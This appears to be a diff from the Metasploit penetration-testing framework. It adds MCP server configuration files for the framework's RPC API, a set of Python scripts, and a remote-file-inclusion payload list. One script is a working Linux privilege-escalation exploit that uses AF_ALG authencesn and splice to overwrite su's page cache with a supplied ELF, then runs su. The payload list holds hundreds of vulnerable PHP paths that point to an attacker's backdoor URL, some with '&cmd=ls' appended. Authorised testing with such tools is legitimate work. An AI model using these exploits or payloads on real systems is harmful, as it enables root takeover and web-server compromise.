# Metasploit RPC API connection (MessagePack)
msf_api:
type: messagepack
host: localhost
port: 55553
ssl: true
endpoint: /api/
user: msfuser
password: CHANGEME
auto_start_rpc: true # Automatically start the RPC server if not running (default: true)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
+32
View File
@@ -0,0 +1,32 @@
# Metasploit RPC API connection (JSON-RPC)
msf_api:
type: json-rpc
host: localhost
port: 8081
ssl: true
endpoint: /api/v1/json-rpc
token: YOUR_BEARER_TOKEN_HERE
# auto_start_rpc is not supported for JSON-RPC (only MessagePack)
# MCP server configuration
mcp:
transport: stdio # stdio (default) or http
# MCP server network configuration (for HTTP transport only)
host: localhost # Host to bind to (default: localhost)
port: 3000 # Port to listen on (default: 3000)
# Rate limiting (optional - defaults shown)
rate_limit:
enabled: true
requests_per_minute: 60
# If the `burst_size` is greater than `requests_per_minute`, a user will be allowed to exceed the rate limit temporarily.
# For example, with `requests_per_minute=5` and `burst_size=10`, a user could make 10 requests in a short period,
# but then would be limited to 5 requests per minute thereafter.
burst_size: 10
# Logging (optional - defaults shown)
logging:
enabled: false
level: INFO # DEBUG, INFO, WARN, ERROR
log_file: ~/.msf4/logs/msfmcp.log
sanitize: true
File diff suppressed because one or more lines are too long
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
import os
import socket
import sys
AF_ALG = 38
ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
def check():
if not os.path.exists('/proc/crypto'):
print('[-] /proc/crypto is missing.')
return
try:
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
except OSError as e:
print('[-] AF_ALG socket family unavailable (' + e.strerror + ').')
return
try:
s.bind(("aead", ALG_NAME))
except OSError as e:
print('[-] ' + repr(ALG_NAME) + ' can not be instantiated (' + e.strerror + ').')
return
finally:
s.close()
print('[+] The exploit socket has been created, encryption primitives are available.')
return True
if __name__ == '__main__':
if not check():
sys.exit(1)
@@ -0,0 +1,9 @@
import os
import shutil
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
os.posix_fadvise(su_fd, 0, 0, os.POSIX_FADV_DONTNEED)
finally:
os.close(su_fd)
+56
View File
@@ -0,0 +1,56 @@
#!/usr/bin/env python3
import os
import base64
import shutil
import socket
import sys
import zlib
AF_ALG = 38
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
SOL_ALG = 279
def setup_sock():
sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
sock.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "0" * 64))
sock.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
op_sock, _ = sock.accept()
return op_sock
def write(op_sock, su_fd, offset, chunk):
op_sock.sendmsg(
[b"A" * 4 + chunk],
[
(SOL_ALG, ALG_SET_OP, b'\x00\x00\x00\x00'),
(SOL_ALG, ALG_SET_IV, b'\x10' + b'\x00' * 19),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, b'\x08\x00\x00\x00')
],
32768
)
r, w = os.pipe()
os.splice(su_fd, w, offset + 4, offset_src=0)
os.splice(r, op_sock.fileno(), offset + 4)
try:
op_sock.recv(8 + offset)
except:
pass
su_path = shutil.which('su')
su_fd = os.open(su_path, os.O_RDONLY)
try:
elf = zlib.decompress(base64.standard_b64decode(sys.argv[1]))
except:
print('[-] failed to load the ELF executable from the argument, it must be base64+gzip')
sys.exit(os.EX_USAGE)
op_sock = setup_sock()
for i in range(0, len(elf), 4):
write(op_sock, su_fd, i, elf[i:i + 4])
op_sock.close()
os.execvp(su_path, ["su"] + sys.argv[1:])
+2247 -2246
View File
@@ -1,2246 +1,2247 @@
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
/=XXpathXX
/?_CONFIG[files][functions_page]=XXpathXX
/?npage=-1&content_dir=XXpathXX%00&cmd=ls
/?npage=1&content_dir=XXpathXX%00&cmd=ls
/?show=XXpathXX?
/A-Blog/navigation/donation.php?navigation_start=XXpathXX
/A-Blog/navigation/latestnews.php?navigation_start=XXpathXX?
/A-Blog/navigation/links.php?navigation_start=XXpathXX?
/A-Blog/navigation/search.php?navigation_end=XXpathXX?
/A-Blog/sources/myaccount.php?open_box=XXpathXX?
/ACGVnews/header.php?PathNews=XXpathXX
/ATutor/documentation/common/frame_toc.php?section=XXpathXX
/ATutor/documentation/common/search.php?section=XXpathXX
/ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX
/ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX?
/Administration/Includes/configureText.php?path_prefix=XXpathXX
/Administration/Includes/contentHome.php?path_prefix=XXpathXX
/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
/Administration/Includes/userHome.php?path_prefix=XXpathXX
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX?
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX?
/BE_config.php?_PSL[classdir]=XXpathXX
/BPNEWS/bn_smrep1.php?bnrep=XXpathXX?&
/Base/Application.php?pear_dir=XXpathXX
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX
/Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX
/Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX
/Beautifier/Core.php?BEAUT_PATH=XXpathXX?
/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX?
/CheckUpload.php?Language=XXpathXX&cmd=ls
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX?
/CoupleDB.php?Parametre=0&DataDirectory=XXpathXX?
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX
/DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX?
/Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX?
/DynaTracker_v151/action.php?base_path=XXpathXX
/DynaTracker_v151/includes_handler.php?base_path=XXpathXX
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX?
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX?
/Exophpdesk_PATH/pipe.php?lang_file=XXpathXX
/FirstPost/block.php?Include=XXpathXX
/Flickrclient.php?path_prefix=XXpathXX
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX?
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX?
/Full_Release/include/body_comm.inc.php?content=XXpathXX
/Gallery/displayCategory.php?basepath=XXpathXX
/Include/lib.inc.php3?Include=XXpathXX?
/Include/variables.php3?Include=XXpathXX?
/Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX
/ListRecords.php?lib_dir=XXpathXX?&cmd=id
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX
/MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX
/Mamblog/admin.mamblog.php?cfgfile=XXpathXX
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX?
/NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX?
/OpenSiteAdmin/indexFooter.php?path=XXpathXX%00
/OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX?
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00
/PHP/includes/header.inc.php?root=XXpathXX?
/PHPDJ_v05/dj/djpage.php?page=XXpathXX?
/PaTh/index.php?rootpath=XXpathXX
/Path_Script/createurl.php?formurl=XXpathXX
/PhotoCart/adminprint.php?admin_folder=XXpathXX
/Picssolution/install/config.php?path=XXpathXX?
/RGboard/include/footer.php?_path[counter]=XXpathXX?
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX?
/SQuery/lib/gore.php?libpath=XXpathXX
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX?
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX?
/ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX
/ScriptPath/footers.php?tinybb_footers=XXpathXX
/ScriptPath/index.php?page=XXpathXX
/Script_Path/config.inc.php?_path=XXpathXX?
/Scripts/app_and_readme/navigator/index.php?page=XXpathXX
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX
/Somery/team.php?checkauth=XXpathXX
/Upload/install.php?skindir=XXpathXX
/Widgets/Base/Footer.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX?
/[path]/mybic_server.php?file=XXpathXX
/[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd
/_administration/securite.php?cfg[document_uri]=XXpathXX
/_blogadata/include/struct_admin.php?incl_page=XXpathXX?
/_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX
/_connect.php?root=XXpathXX
/_friendly/core/data/_load.php?friendly_path=XXpathXX
/_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX
/_friendly/core/display/_load.php?friendly_path=XXpathXX
/_friendly/core/support/_load.php?friendly_path=XXpathXX
/_functions.php?prefix=XXpathXX
/_includes/settings.inc.php?approot=XXpathXX
/_theme/breadcrumb.php?rootBase=XXpathXX
/_wk/wk_lang.php?WK[wkPath]=XXpathXX
/abf_js.php?abs_pfad=XXpathXX?&cmd=id
/about.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/about.php?bibtexrootrel=XXpathXX?
/aboutinfo.php?bibtexrootrel=XXpathXX?
/acc.php?page=XXpathXX
/access/login.php?path_to_root=XXpathXX
/account.php?insPath=XXpathXX
/accsess/login.php?path_to_root=XXpathXX
/active/components/xmlrpc/client.php?c[components]=XXpathXX
/ad_main.php?_mygamefile=XXpathXX
/add.cgi.php?blog_theme=XXpathXX
/add_link.php?blog_theme=XXpathXX
/addpost_newpoll.php?addpoll=preview&thispath=XXpathXX
/addressbook.php?GLOBALS[basedir]=XXpathXX?
/addsite.php?returnpath=XXpathXX
/addvip.php?msetstr["PROGSDIR"]=XXpathXX
/adm/krgourl.php?DOCUMENT_ROOT=XXpathXX?
/adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX?
/admin.loudmouth.php?mainframe=XXpathXX
/admin.php?Madoa=XXpathXX?
/admin.php?cal_dir=XXpathXX
/admin.php?env_dir=XXpathXX
/admin.php?lang=XXpathXX
/admin.php?page[path]=XXpathXX?&cmd=ls
/admin.php?submit=submit&form_include_template=XXpathXX
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
/admin/ST_countries.php?include_path=XXpathXX?
/admin/ST_platforms.php?include_path=XXpathXX?
/admin/addentry.php?phpbb_root_path=XXpathXX?
/admin/addons/archive/archive.php?adminfolder=XXpathXX
/admin/admin.php?path=XXpathXX
/admin/admin.php?site_url=XXpathXX
/admin/admin_forgotten_password.php?root_folder_path=XXpathXX
/admin/admin_news_bot.php?root_path=XXpathXX?
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX
/admin/admin_users.php?phpbb_root_path=XXpathXX
/admin/auth.php?xcart_dir=XXpathXX?
/admin/auth/secure.php?cfgProgDir=XXpathXX?
/admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX
/admin/bin/patch.php?INSTALL_FOLDER=XXpathXX
/admin/catagory.php?language=XXpathXX
/admin/classes/pear/OLE/PPS.php?homedir=XXpathXX
/admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX
/admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX
/admin/code/index.php?load_page=XXpathXX
/admin/comment.php?config[installdir]=XXpathXX
/admin/common-menu.php?CONF[local_path]=XXpathXX
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX?
/admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id
/admin/directory.php?config[installdir]=XXpathXX
/admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX
/admin/frontpage_right.php?loadadminpage=XXpathXX
/admin/header.php?loc=XXpathXX
/admin/inc/add.php?format_menue=XXpathXX
/admin/inc/change_action.php?format_menue=XXpathXX
/admin/include/common.php?commonIncludePath=XXpathXX?
/admin/include/header.php?repertoire=XXpathXX?
/admin/include/lib.module.php?mod_root=XXpathXX
/admin/includes/admin_header.php?level=XXpathXX?
/admin/includes/author_panel_header.php?level=XXpathXX?
/admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00
/admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX?
/admin/index.php?path_to_script=XXpathXX?&cmd=ls
/admin/index.php?pg=XXpathXX?
/admin/index.php?xtrphome=XXpathXX
/admin/index_sitios.php?_VIEW=XXpathXX
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX
/admin/login.php?absolute_path=XXpathXX
/admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls
/admin/news.php?language=XXpathXX
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX
/admin/sendmsg.php?config[installdir]=XXpathXX
/admin/setup/level2.php?dir=XXpathXX
/admin/system/config/conf-activation.php?site_path=XXpathXX
/admin/system/include.php?skindir=XXpathXX
/admin/system/include.php?start=1&skindir=XXpathXX
/admin/system/menu/item.php?site_path=XXpathXX
/admin/system/modules/conf_modules.php?site_path=XXpathXX
/admin/templates/template_thumbnail.php?thumb_template=XXpathXX
/admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?&
/admin/themes.php?config[installdir]=XXpathXX
/admin/tools/utf8conversion/index.php?path=XXpathXX?
/admin/user_user.php?language=XXpathXX
/admincp/auth/checklogin.php?cfgProgDir=XXpathXX
/admincp/auth/secure.php?cfgProgDir=XXpathXX
/adminhead.php?path[docroot]=XXpathXX
/admini/admin.php?INC=XXpathXX?
/admini/index.php?INC=XXpathXX?
/administrator/admin.php?site_absolute_path=XXpathXX?
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX?
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX?
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_jreactions/langset.php?comPath=XXpathXX?
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX?
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=XXpathXX
